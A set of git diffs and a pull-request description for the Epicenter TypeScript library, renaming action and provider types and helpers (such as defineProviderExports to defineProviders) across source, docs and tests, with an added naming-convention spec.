 // Provider system
-export { defineProviderExports } from './core/provider';
+export { defineProviders } from './core/provider';
 export type {
 	BooleanColumnSchema,
 	CellValue,

--- a/packages/epicenter/src/index.shared.ts
+++ b/packages/epicenter/src/index.shared.ts
@@ -38,19 +38,13 @@ export {
 	sql,
 } from 'drizzle-orm';
 
-export type {
-	Action,
-	Mutation,
-	Query,
-	WorkspaceActionMap,
-	WorkspaceExports,
-} from './core/actions';
+export type { Action, Mutation, Query, ActionExports } from './core/actions';
 
 // Action helpers
 export {
 	defineMutation,
 	defineQuery,
-	defineWorkspaceExports,
+	defineActionExports,
 	extractActions,
 	isAction,
 	isMutation,

--- a/packages/epicenter/src/index.shared.ts
+++ b/packages/epicenter/src/index.shared.ts
@@ -142,7 +142,7 @@ export { iterActions } from './core/workspace/client.shared';
 export type {
 	AnyWorkspaceConfig,
 	WorkspaceConfig,
-	WorkspacesToExports,
+	WorkspacesToActions,
 } from './core/workspace/config';
 export { defineWorkspace } from './core/workspace/config';
 

--- a/packages/epicenter/src/indexes/markdown/markdown-index.ts
+++ b/packages/epicenter/src/indexes/markdown/markdown-index.ts
@@ -8,7 +8,7 @@ import { defineQuery } from '../../core/actions';
 import type { TableHelper } from '../../core/db/table-helper';
 import { IndexErr, IndexError } from '../../core/errors';
 import {
-	defineProviderExports,
+	defineProviders,
 	type Provider,
 	type ProviderContext,
 } from '../../core/provider';
@@ -902,7 +902,7 @@ export const markdownProvider = (async <TSchema extends WorkspaceSchema>(
 	const unsubscribers = registerYJSObservers();
 	const watchers = registerFileWatchers();
 
-	return defineProviderExports({
+	return defineProviders({
 		async destroy() {
 			for (const unsub of unsubscribers) {
 				unsub();

--- a/packages/epicenter/src/providers/markdown/markdown-provider.ts
+++ b/packages/epicenter/src/providers/markdown/markdown-provider.ts
@@ -6,7 +6,7 @@ import { tryAsync, trySync } from 'wellcrafted/result';
 import { defineQuery } from '../../core/actions';
 import { ProviderErr, ProviderError } from '../../core/errors';
 import {
-	defineProviderExports,
+	defineProviders,
 	type Provider,
 	type ProviderContext,
 } from '../../core/provider.shared';
@@ -1092,7 +1092,7 @@ export const markdownProvider = (async <TSchema extends WorkspaceSchema>(
 		console.error('[MarkdownProvider] Background validation failed:', err);
 	});
 
-	return defineProviderExports({
+	return defineProviders({
 		async destroy() {
 			for (const unsub of unsubscribers) {
 				unsub();

--- a/packages/epicenter/src/providers/persistence/desktop.ts
+++ b/packages/epicenter/src/providers/persistence/desktop.ts
@@ -30,7 +30,7 @@ import type { Provider } from '../../core/provider';
  *   providers: {
  *     persistence: setupPersistence,  // → .epicenter/providers/persistence/blog.yjs
  *   },
- *   exports: ({ tables }) => ({ ... }),
+ *   actions: ({ tables }) => ({ ... }),
  * });
  * ```
  */

--- a/packages/epicenter/src/providers/persistence/web.ts
+++ b/packages/epicenter/src/providers/persistence/web.ts
@@ -38,7 +38,7 @@ import type { WorkspaceSchema } from '../../core/schema';
  *   providers: {
  *     persistence: setupPersistence,
  *   },
- *   exports: ({ tables }) => ({ ... }),
+ *   actions: ({ tables }) => ({ ... }),
  * });
  * ```
  *
@@ -63,7 +63,7 @@ import type { WorkspaceSchema } from '../../core/schema';
  *   providers: {
  *     persistence: setupPersistence,
  *   },
- *   exports: ({ tables }) => ({ ... }),
+ *   actions: ({ tables }) => ({ ... }),
  * });
  *
  * const notes = defineWorkspace({
@@ -72,7 +72,7 @@ import type { WorkspaceSchema } from '../../core/schema';
  *   providers: {
  *     persistence: setupPersistence,
  *   },
- *   exports: ({ tables }) => ({ ... }),
+ *   actions: ({ tables }) => ({ ... }),
  * });
  *
  * // Workspaces are isolated, each with separate IndexedDB storage

--- a/packages/epicenter/src/providers/sqlite/sqlite-provider.ts
+++ b/packages/epicenter/src/providers/sqlite/sqlite-provider.ts
@@ -71,7 +71,7 @@ type SqliteProviderOptions = {
  *   sqlite: (c) => sqliteProvider(c, { debounceMs: 50 }),
  * },
  *
- * exports: ({ providers }) => ({
+ * actions: ({ providers }) => ({
  *   // Access exported resources from the provider
  *   getPost: defineQuery({
  *     handler: async ({ id }) => {

--- a/packages/epicenter/src/providers/sqlite/sqlite-provider.ts
+++ b/packages/epicenter/src/providers/sqlite/sqlite-provider.ts
@@ -9,7 +9,7 @@ import { tryAsync } from 'wellcrafted/result';
 import { defineQuery } from '../../core/actions';
 import { IndexErr, IndexError } from '../../core/errors';
 import {
-	defineProviderExports,
+	defineProviders,
 	type Provider,
 	type ProviderContext,
 } from '../../core/provider';
@@ -42,7 +42,7 @@ type SqliteProviderOptions = {
  * Syncs YJS changes to a SQLite database and exposes Drizzle query interface.
  *
  * This provider creates internal resources (sqliteDb, drizzleTables) and exports them
- * via defineProviderExports(). All exported resources become available in your workspace exports
+ * via defineProviders(). All exported resources become available in your workspace exports
  * via the `providers` parameter.
  *
  * **Storage**:
@@ -292,7 +292,7 @@ export const sqliteProvider = (async <TSchema extends WorkspaceSchema>(
 	}
 
 	// Return destroy function alongside exported resources (flattened structure)
-	return defineProviderExports({
+	return defineProviders({
 		async destroy() {
 			// Clear any pending sync timeout
 			if (syncTimeout) {

--- a/packages/epicenter/src/providers/websocket-sync.ts
+++ b/packages/epicenter/src/providers/websocket-sync.ts
@@ -150,7 +150,7 @@ export type WebsocketSyncConfig = {
  *       url: 'ws://localhost:3913/sync',
  *     }),
  *   },
- *   exports: ({ tables }) => ({ ... }),
+ *   actions: ({ tables }) => ({ ... }),
  * });
  * ```
  *
@@ -175,7 +175,7 @@ export type WebsocketSyncConfig = {
  *     syncLaptop: createWebsocketSyncProvider({ url: SYNC_NODES.laptop }),
  *     syncCloud: createWebsocketSyncProvider({ url: SYNC_NODES.cloud }),
  *   },
- *   exports: ({ tables }) => ({ ... }),
+ *   actions: ({ tables }) => ({ ... }),
  * });
  * ```
  *
@@ -199,7 +199,7 @@ export type WebsocketSyncConfig = {
  *     syncToLaptop: createWebsocketSyncProvider({ url: SYNC_NODES.laptop }),
  *     syncToCloud: createWebsocketSyncProvider({ url: SYNC_NODES.cloud }),
  *   },
- *   exports: ({ tables }) => ({ ... }),
+ *   actions: ({ tables }) => ({ ... }),
  * });
  * ```
  *

--- a/packages/epicenter/src/server/server.ts
+++ b/packages/epicenter/src/server/server.ts
@@ -1,7 +1,7 @@
 import { openapi } from '@elysiajs/openapi';
 import { Elysia } from 'elysia';
 import { Err, isResult, Ok } from 'wellcrafted/result';
-import type { ActionExports } from '../core/actions';
+import type { Actions } from '../core/actions';
 import type {
 	AnyWorkspaceConfig,
 	EpicenterClient,
@@ -72,7 +72,7 @@ export function createServer<
 				getDoc: (room) => {
 					const workspace = client[
 						room as keyof WorkspacesToClients<TWorkspaces>
-					] as WorkspaceClient<ActionExports> | undefined;
+					] as WorkspaceClient<Actions> | undefined;
 					return workspace?.$ydoc;
 				},
 			}),

--- a/packages/epicenter/src/server/server.ts
+++ b/packages/epicenter/src/server/server.ts
@@ -1,7 +1,7 @@
 import { openapi } from '@elysiajs/openapi';
 import { Elysia } from 'elysia';
 import { Err, isResult, Ok } from 'wellcrafted/result';
-import type { WorkspaceExports } from '../core/actions';
+import type { ActionExports } from '../core/actions';
 import type {
 	AnyWorkspaceConfig,
 	EpicenterClient,
@@ -72,7 +72,7 @@ export function createServer<
 				getDoc: (room) => {
 					const workspace = client[
 						room as keyof WorkspacesToClients<TWorkspaces>
-					] as WorkspaceClient<WorkspaceExports> | undefined;
+					] as WorkspaceClient<ActionExports> | undefined;
 					return workspace?.$ydoc;
 				},
 			}),

--- a/packages/epicenter/tests/integration/server.test.ts
+++ b/packages/epicenter/tests/integration/server.test.ts
@@ -48,7 +48,7 @@ describe('Server Integration Tests', () => {
 			sqlite: (c) => sqliteProvider(c),
 		},
 
-		exports: ({ tables, providers }) => ({
+		actions: ({ tables, providers }) => ({
 			createPost: defineMutation({
 				input: type({
 					title: 'string >= 1',
@@ -246,7 +246,7 @@ describe('Server Integration Tests', () => {
 					}),
 			},
 
-			exports: ({ tables }) => ({
+			actions: ({ tables }) => ({
 				createUser: defineMutation({
 					input: type({
 						email: 'string',

--- a/packages/epicenter/tests/integration/sync-client-compat.test.ts
+++ b/packages/epicenter/tests/integration/sync-client-compat.test.ts
@@ -36,7 +36,7 @@ describe('y-websocket Client Compatibility', () => {
 			},
 		},
 		providers: {},
-		exports: ({ tables }) => ({
+		actions: ({ tables }) => ({
 			createNote: defineMutation({
 				input: type({ content: 'string' }),
 				description: 'Create a new note',

--- a/packages/epicenter/tests/integration/sync.test.ts
+++ b/packages/epicenter/tests/integration/sync.test.ts
@@ -39,7 +39,7 @@ describe('WebSocket Sync Integration Tests', () => {
 
 		providers: {},
 
-		exports: ({ tables }) => ({
+		actions: ({ tables }) => ({
 			createNote: defineMutation({
 				input: type({
 					content: 'string',

--- a/specs/20251226T144100-action-index-naming-inversion.md
+++ b/specs/20251226T144100-action-index-naming-inversion.md
@@ -1,0 +1,109 @@
+# Action/Provider Naming Simplification
+
+## Problem
+
+Current naming uses "Exports" suffix unnecessarily:
+
+| Current                 | Cleaner Name      |
+| ----------------------- | ----------------- |
+| `ActionExports`         | `Actions`         |
+| `defineActionExports`   | `defineActions`   |
+| `ProviderExports`       | `Providers`       |
+| `defineProviderExports` | `defineProviders` |
+
+The "Exports" suffix is redundant. The returned objects ARE the actions/providers.
+
+## Solution
+
+Remove "Exports" suffix from type and function names.
+
+### Actions
+
+```typescript
+// Before
+type ActionExports = { [key: string]: Action | ActionExports };
+function defineActionExports<T extends ActionExports>(exports: T): T;
+
+// After
+type Actions = { [key: string]: Action | Actions };
+function defineActions<T extends Actions>(exports: T): T;
+```
+
+### Providers
+
+```typescript
+// Before
+type ProviderExports = { destroy?: () => void | Promise<void> };
+function defineProviderExports<T extends ProviderExports>(exports: T): T;
+
+// After
+type Providers = { destroy?: () => void | Promise<void> };
+function defineProviders<T extends Providers>(exports: T): T;
+```
+
+## Changes
+
+- [x] Rename `ActionExports` → `Actions`
+- [x] Rename `defineActionExports` → `defineActions`
+- [x] Rename `ProviderExports` → `Providers`
+- [x] Rename `defineProviderExports` → `defineProviders`
+- [x] Update all references across codebase
+- [x] Update documentation
+
+## Note
+
+Config key `actions` remains unchanged—it's where you define the actions factory.
+
+### After
+
+```typescript
+type WorkspaceConfig = {
+  exports: (context) => TActions;  // Factory named "exports"
+};
+
+type TActions extends Actions;  // Output named "actions"
+```
+
+## Naming Convention
+
+| Component                | Name            | Rationale                           |
+| ------------------------ | --------------- | ----------------------------------- |
+| Config key               | `exports`       | Generic; what the workspace exports |
+| Return type              | `Actions`       | These ARE the actions you call      |
+| Factory type (if needed) | `ActionFactory` | Singular factory, plural output     |
+
+Same pattern for indexes:
+
+| Component    | Name                                  |
+| ------------ | ------------------------------------- |
+| Config key   | `exports` (or separate `indexes` key) |
+| Return type  | `Indexes`                             |
+| Factory type | `IndexFactory`                        |
+
+## Changes
+
+- [ ] Rename `ActionExports` → `Actions`
+- [ ] Rename config key `actions` → `exports`
+- [ ] Update all workspace definitions
+- [ ] Update types: `WorkspaceConfig`, `AnyWorkspaceConfig`, etc.
+- [ ] Update documentation
+
+## Migration
+
+This is a breaking change. All workspace definitions need updating:
+
+```typescript
+// Before
+defineWorkspace({
+  actions: ({ tables }) => ({
+    createPost: defineMutation({ ... }),
+  })
+})
+
+// After
+defineWorkspace({
+  exports: ({ tables }) => ({
+    createPost: defineMutation({ ... }),
+  })
+})
+```


### PR DESCRIPTION
This PR applies the naming inversion pattern to Epicenter's core types and migrates the rules system to Claude Skills format.

## Naming Inversion

Renamed types to follow the principle that "the thing you use gets the simple name":

- `ActionExports` → `Actions`
- `ProviderExports` → `Providers`
- `defineActionExports` → `defineActions`
- `defineProviderExports` → `defineProviders`
- `InferProviderExports` → `InferProviders`

Also renamed variables like `workspaceExports` → `workspaceActions` for consistency, and removed the unused `extractActions` function.

Added documentation article explaining the naming inversion pattern at `docs/articles/naming-inversion-pattern.md`.

## Skills Migration

Migrated all rules from `rules/` directory to Claude Skills format in `skills/`:

- Each skill is now a self-contained folder with `SKILL.md`
- Skills have structured metadata (description, tags)
- Organized by category: typescript, svelte, git, error-handling, etc.

## Other Changes

- Consolidated `ProviderContext` types into `provider.shared.ts`
- Added architecture documentation with visual diagrams
- Various bug fixes for server URLs, CLI workspace discovery, and provider logging